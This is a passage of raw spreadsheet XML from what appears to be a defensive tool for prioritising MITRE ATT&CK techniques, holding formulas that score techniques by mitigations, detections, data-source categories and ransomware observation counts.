        <v>0</v>
      </c>
      <c r="R315" s="57" t="s">
        <v>1089</v>
      </c>
      <c r="S315" s="57">
        <v>3</v>
      </c>
      <c r="T315" s="57" t="s">
        <v>1090</v>
      </c>
      <c r="U315" s="57">
        <v>9</v>
      </c>
      <c r="V315" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.1285715238095238</v>
      </c>
      <c r="W315" s="37">
        <v>12</v>
      </c>
      <c r="X315" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y315" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z315" s="37">
        <v>3</v>
      </c>
      <c r="AA315" s="37">
        <v>0.03</v>
      </c>
      <c r="AB315" s="37">
        <v>0.03</v>
      </c>
      <c r="AC315" s="37"/>
      <c r="AD315" s="50" t="s">
        <v>1091</v>
      </c>
      <c r="AE315" s="37" t="str" cm="1">
        <f t="array" ref="AE315">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD315)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF315" s="37">
        <v>311</v>
      </c>
      <c r="AG315" s="37" t="str" cm="1">
        <f t="array" ref="AG315">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD315)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH315" s="37">
        <v>311</v>
      </c>
      <c r="AI315" s="37" t="str" cm="1">
        <f t="array" ref="AI315">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD315)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ315" s="37">
        <v>311</v>
      </c>
      <c r="AK315" s="37" t="str" cm="1">
        <f t="array" ref="AK315">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD315)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL315" s="37">
        <v>311</v>
      </c>
      <c r="AM315" s="37" t="str" cm="1">
        <f t="array" ref="AM315">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD315)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN315" s="37">
        <v>0</v>
      </c>
      <c r="AO315" s="37">
        <v>0</v>
      </c>
      <c r="AP315" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ315" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>74.107182380952381</v>
      </c>
      <c r="AR315" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS315" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT315" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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16" spans="1:47" ht="68">
      <c r="A316" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B316" s="37">
        <f t="shared" si="4"/>
        <v>577.4150195714285</v>
      </c>
      <c r="C316" s="37" t="s">
        <v>1101</v>
      </c>
      <c r="D316" s="50" t="s">
        <v>1102</v>
      </c>
      <c r="E316" s="37"/>
      <c r="F316" s="37">
        <v>1</v>
      </c>
      <c r="G316" s="37">
        <v>1</v>
      </c>
      <c r="H316" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I316" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J316" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K316" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L316" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M316" s="37">
        <v>9.9209999999999993E-3</v>
      </c>
      <c r="N316" s="56">
        <v>0</v>
      </c>
      <c r="O316" s="56">
        <v>1</v>
      </c>
      <c r="P316" s="56">
        <v>2</v>
      </c>
      <c r="Q316" s="56">
        <v>7</v>
      </c>
      <c r="R316" s="57" t="s">
        <v>1103</v>
      </c>
      <c r="S316" s="57">
        <v>9</v>
      </c>
      <c r="T316" s="57" t="s">
        <v>1104</v>
      </c>
      <c r="U316" s="57">
        <v>23</v>
      </c>
      <c r="V316" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.35238085714285711</v>
      </c>
      <c r="W316" s="37">
        <v>32</v>
      </c>
      <c r="X316" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y316" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z316" s="37">
        <v>10</v>
      </c>
      <c r="AA316" s="37">
        <v>0.1</v>
      </c>
      <c r="AB316" s="37">
        <v>0.1</v>
      </c>
      <c r="AC316" s="37"/>
      <c r="AD316" s="50" t="s">
        <v>1105</v>
      </c>
      <c r="AE316" s="37" t="str" cm="1">
        <f t="array" ref="AE316">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD316)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF316" s="37">
        <v>312</v>
      </c>
      <c r="AG316" s="37" t="str" cm="1">
        <f t="array" ref="AG316">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD316)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH316" s="37">
        <v>312</v>
      </c>
      <c r="AI316" s="37" t="str" cm="1">
        <f t="array" ref="AI316">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD316)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ316" s="37">
        <v>312</v>
      </c>
      <c r="AK316" s="37" t="str" cm="1">
        <f t="array" ref="AK316">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD316)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL316" s="37">
        <v>312</v>
      </c>
      <c r="AM316" s="37" t="str" cm="1">
        <f t="array" ref="AM316">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD316)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN316" s="37">
        <v>0</v>
      </c>
      <c r="AO316" s="37">
        <v>0</v>
      </c>
      <c r="AP316" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ316" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>192.47167319047617</v>
      </c>
      <c r="AR316" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS316" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT316" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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17" spans="1:47" ht="17">
      <c r="A317" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B317" s="37">
        <f t="shared" si="4"/>
        <v>399.76678600000002</v>
      </c>
      <c r="C317" s="37" t="s">
        <v>1106</v>
      </c>
      <c r="D317" s="50" t="s">
        <v>1102</v>
      </c>
      <c r="E317" s="37" t="s">
        <v>1107</v>
      </c>
      <c r="F317" s="37">
        <v>1</v>
      </c>
      <c r="G317" s="37">
        <v>1</v>
      </c>
      <c r="H317" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I317" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J317" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K317" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L317" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M317" s="37">
        <v>0</v>
      </c>
      <c r="N317" s="56">
        <v>0</v>
      </c>
      <c r="O317" s="56">
        <v>0</v>
      </c>
      <c r="P317" s="56">
        <v>0</v>
      </c>
      <c r="Q317" s="56">
        <v>0</v>
      </c>
      <c r="R317" s="57" t="s">
        <v>1103</v>
      </c>
      <c r="S317" s="57">
        <v>9</v>
      </c>
      <c r="T317" s="57" t="s">
        <v>1108</v>
      </c>
      <c r="U317" s="57">
        <v>14</v>
      </c>
      <c r="V317" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21904771428571429</v>
      </c>
      <c r="W317" s="37">
        <v>23</v>
      </c>
      <c r="X317" s="37">
        <v>0.418182</v>
      </c>
      <c r="Y317" s="37">
        <v>0.418182</v>
      </c>
      <c r="Z317" s="37">
        <v>0</v>
      </c>
      <c r="AA317" s="37">
        <v>0</v>
      </c>
      <c r="AB317" s="37">
        <v>0</v>
      </c>
      <c r="AC317" s="37"/>
      <c r="AD317" s="50" t="s">
        <v>227</v>
      </c>
      <c r="AE317" s="37" t="str" cm="1">
        <f t="array" ref="AE317">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD317)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF317" s="37">
        <v>313</v>
      </c>
      <c r="AG317" s="37" t="str" cm="1">
        <f t="array" ref="AG317">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD317)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH317" s="37">
        <v>313</v>
      </c>
      <c r="AI317" s="37" t="str" cm="1">
        <f t="array" ref="AI317">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD317)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ317" s="37">
        <v>313</v>
      </c>
      <c r="AK317" s="37" t="str" cm="1">
        <f t="array" ref="AK317">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD317)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL317" s="37">
        <v>313</v>
      </c>
      <c r="AM317" s="37" t="str" cm="1">
        <f t="array" ref="AM317">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD317)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN317" s="37">
        <v>0</v>
      </c>
      <c r="AO317" s="37">
        <v>1</v>
      </c>
      <c r="AP317" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ317" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>133.25559533333333</v>
      </c>
      <c r="AR317" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS317" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT317" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU31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3.1965617936507935</v>
      </c>
    </row>
    <row r="318" spans="1:47" ht="34">
      <c r="A318" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B318" s="37">
        <f t="shared" si="4"/>
        <v>526.74273742857144</v>
      </c>
      <c r="C318" s="37" t="s">
        <v>1109</v>
      </c>
      <c r="D318" s="50" t="s">
        <v>1102</v>
      </c>
      <c r="E318" s="37" t="s">
        <v>1110</v>
      </c>
      <c r="F318" s="37">
        <v>1</v>
      </c>
      <c r="G318" s="37">
        <v>1</v>
      </c>
      <c r="H318" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I318" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J318" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K318" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L318" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M318" s="37">
        <v>0</v>
      </c>
      <c r="N318" s="56">
        <v>0</v>
      </c>
      <c r="O318" s="56">
        <v>3</v>
      </c>
      <c r="P318" s="56">
        <v>0</v>
      </c>
      <c r="Q318" s="56">
        <v>0</v>
      </c>
      <c r="R318" s="57" t="s">
        <v>1103</v>
      </c>
      <c r="S318" s="57">
        <v>9</v>
      </c>
      <c r="T318" s="57" t="s">
        <v>1104</v>
      </c>
      <c r="U318" s="57">
        <v>23</v>
      </c>
      <c r="V318" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.31904752380952378</v>
      </c>
      <c r="W318" s="37">
        <v>32</v>
      </c>
      <c r="X318" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y318" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z318" s="37">
        <v>3</v>
      </c>
      <c r="AA318" s="37">
        <v>0.03</v>
      </c>
      <c r="AB318" s="37">
        <v>0.03</v>
      </c>
      <c r="AC318" s="37"/>
      <c r="AD318" s="50" t="s">
        <v>1111</v>
      </c>
      <c r="AE318" s="37" t="str" cm="1">
        <f t="array" ref="AE318">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD318)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF318" s="37">
        <v>314</v>
      </c>
      <c r="AG318" s="37" t="str" cm="1">
        <f t="array" ref="AG318">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD318)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH318" s="37">
        <v>314</v>
      </c>
      <c r="AI318" s="37" t="str" cm="1">
        <f t="array" ref="AI318">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD318)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ318" s="37">
        <v>314</v>
      </c>
      <c r="AK318" s="37" t="str" cm="1">
        <f t="array" ref="AK318">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD318)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL318" s="37">
        <v>314</v>
      </c>
      <c r="AM318" s="37" t="str" cm="1">
        <f t="array" ref="AM318">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD318)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN318" s="37">
        <v>0</v>
      </c>
      <c r="AO318" s="37">
        <v>0</v>
      </c>
      <c r="AP318" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ318" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>175.58091247619049</v>
      </c>
      <c r="AR318" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS318" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT318" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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19" spans="1:47" ht="68">
      <c r="A319" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B319" s="37">
        <f t="shared" si="4"/>
        <v>444.35268119047612</v>
      </c>
      <c r="C319" s="37" t="s">
        <v>1112</v>
      </c>
      <c r="D319" s="50" t="s">
        <v>1102</v>
      </c>
      <c r="E319" s="37" t="s">
        <v>1113</v>
      </c>
      <c r="F319" s="37">
        <v>1</v>
      </c>
      <c r="G319" s="37">
        <v>1</v>
      </c>
      <c r="H319" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I319" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J319" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K319" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L319" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M319" s="37">
        <v>0</v>
      </c>
      <c r="N319" s="56">
        <v>1</v>
      </c>
      <c r="O319" s="56">
        <v>27</v>
      </c>
      <c r="P319" s="56">
        <v>2</v>
      </c>
      <c r="Q319" s="56">
        <v>7</v>
      </c>
      <c r="R319" s="57"/>
      <c r="S319" s="57">
        <v>0</v>
      </c>
      <c r="T319" s="57" t="s">
        <v>1114</v>
      </c>
      <c r="U319" s="57">
        <v>8</v>
      </c>
      <c r="V319" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.25238119047619045</v>
      </c>
      <c r="W319" s="37">
        <v>8</v>
      </c>
      <c r="X319" s="37">
        <v>0.145455</v>
      </c>
      <c r="Y319" s="37">
        <v>0.145455</v>
      </c>
      <c r="Z319" s="37">
        <v>37</v>
      </c>
      <c r="AA319" s="37">
        <v>0.37</v>
      </c>
      <c r="AB319" s="37">
        <v>0.37</v>
      </c>
      <c r="AC319" s="37"/>
      <c r="AD319" s="50" t="s">
        <v>1105</v>
      </c>
      <c r="AE319" s="37" t="str" cm="1">
        <f t="array" ref="AE319">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD319)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF319" s="37">
        <v>315</v>
      </c>
      <c r="AG319" s="37" t="str" cm="1">
        <f t="array" ref="AG319">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD319)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH319" s="37">
        <v>315</v>
      </c>
      <c r="AI319" s="37" t="str" cm="1">
        <f t="array" ref="AI319">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD319)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ319" s="37">
        <v>315</v>
      </c>
      <c r="AK319" s="37" t="str" cm="1">
        <f t="array" ref="AK319">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD319)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL319" s="37">
        <v>315</v>
      </c>
      <c r="AM319" s="37" t="str" cm="1">
        <f t="array" ref="AM319">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD319)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN319" s="37">
        <v>0</v>
      </c>
      <c r="AO319" s="37">
        <v>0</v>
      </c>
      <c r="AP319" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ319" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>148.11756039682538</v>
      </c>
      <c r="AR319" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS319" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT319" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU31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20" spans="1:47" ht="34">
      <c r="A320" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B320" s="37">
        <f t="shared" si="4"/>
        <v>126.5</v>
      </c>
      <c r="C320" s="37" t="s">
        <v>1115</v>
      </c>
      <c r="D320" s="50" t="s">
        <v>1102</v>
      </c>
      <c r="E320" s="37" t="s">
        <v>1116</v>
      </c>
      <c r="F320" s="37">
        <v>1</v>
      </c>
      <c r="G320" s="37">
        <v>1</v>
      </c>
      <c r="H320" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I320" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J320" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K320" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L320" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M320" s="37">
        <v>0</v>
      </c>
      <c r="N320" s="56">
        <v>0</v>
      </c>
      <c r="O320" s="56">
        <v>0</v>
      </c>
      <c r="P320" s="56">
        <v>0</v>
      </c>
      <c r="Q320" s="56">
        <v>0</v>
      </c>
      <c r="R320" s="57"/>
      <c r="S320" s="57">
        <v>0</v>
      </c>
      <c r="T320" s="57" t="s">
        <v>1117</v>
      </c>
      <c r="U320" s="57">
        <v>0</v>
      </c>
      <c r="V320" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W320" s="37">
        <v>0</v>
      </c>
      <c r="X320" s="37">
        <v>0</v>
      </c>
      <c r="Y320" s="37">
        <v>0</v>
      </c>
      <c r="Z320" s="37">
        <v>0</v>
      </c>
      <c r="AA320" s="37">
        <v>0</v>
      </c>
      <c r="AB320" s="37">
        <v>0</v>
      </c>
      <c r="AC320" s="37"/>
      <c r="AD320" s="50" t="s">
        <v>1118</v>
      </c>
      <c r="AE320" s="37" t="str" cm="1">
        <f t="array" ref="AE320">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD320)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF320" s="37">
        <v>316</v>
      </c>
      <c r="AG320" s="37" t="str" cm="1">
